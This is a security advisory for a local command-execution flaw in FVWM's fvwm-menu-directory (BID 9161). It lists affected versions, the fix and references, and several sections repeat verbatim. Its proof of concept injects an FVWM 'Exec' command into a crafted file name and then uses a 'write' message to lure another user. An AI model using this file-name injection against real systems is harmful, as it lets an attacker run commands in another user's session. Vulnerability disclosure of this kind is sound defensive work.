FVWM fvwm-menu-directory Command Execution Vulnerability
BID:9161
Info
FVWM fvwm-menu-directory Command Execution Vulnerability
| Bugtraq ID: | 9161 |
| Class: | Input Validation Error |
| CVE: |
CVE-2006-5969 |
| Remote: | No |
| Local: | Yes |
| Published: | Dec 05 2003 12:00AM |
| Updated: | Nov 23 2006 09:45PM |
| Credit: | The disclosure of this issue has been credited to [email protected]. |
| Vulnerable: |
FVWM FVWM 2.5.17 FVWM FVWM 2.5.8 FVWM FVWM 2.4.17 |
| Not Vulnerable: |
FVWM FVWM 2.5.10 FVWM FVWM 2.4.18 FVWM FVWM 2.5.18 R1 |
Discussion
FVWM fvwm-menu-directory Command Execution Vulnerability
It has been reported that FVWM may be prone to a command execution vulnerability that may allow an attacker to execute malicious commands on a vulnerable system. It has been reported that the fvwm-menu-directory component does not properly sanitize user input and allows a user with write permissions to a directory to execute arbitrary commands.
FVWM versions 2.14.17 and 2.5.8 have been reported to be vulnerable to this issue, however other versions may be affected as well.
It has been reported that FVWM may be prone to a command execution vulnerability that may allow an attacker to execute malicious commands on a vulnerable system. It has been reported that the fvwm-menu-directory component does not properly sanitize user input and allows a user with write permissions to a directory to execute arbitrary commands.
FVWM versions 2.14.17 and 2.5.8 have been reported to be vulnerable to this issue, however other versions may be affected as well.
Exploit / POC
FVWM fvwm-menu-directory Command Execution Vulnerability
The following proof of concept has been provided:
$ touch '
> Exec xmessage "0wn3d"
>
> '
$ write fvwmguy <<< "k3wl mp3 in `pwd` OMG LOLOLOL!!!1111"
The following proof of concept has been provided:
$ touch '
> Exec xmessage "0wn3d"
>
> '
$ write fvwmguy <<< "k3wl mp3 in `pwd` OMG LOLOLOL!!!1111"
Solution / Fix
FVWM fvwm-menu-directory Command Execution Vulnerability
Solution:
The vendor has released versions 2.4.18 of the stable branch, and 2.5.10 of their unstable branch that deal with this issue.
FVWM FVWM 2.4.17
FVWM FVWM 2.5.8
Solution:
The vendor has released versions 2.4.18 of the stable branch, and 2.5.10 of their unstable branch that deal with this issue.
FVWM FVWM 2.4.17
-
FVWM fvwm-2.4.18.tar.gz
ftp://ftp.fvwm.org/pub/fvwm/version-2/fvwm-2.4.18.tar.gz
FVWM FVWM 2.5.8
-
FVWM fvwm-2.5.10.tar.gz
ftp://ftp.fvwm.org/pub/fvwm/version-2/fvwm-2.5.10.tar.gz
References
FVWM fvwm-menu-directory Command Execution Vulnerability
References:
References:
- FVWM Changelogs (FVWM)
- FVWM Homepage (FVWM)
- fvwm security issue (Tavis Ormandy)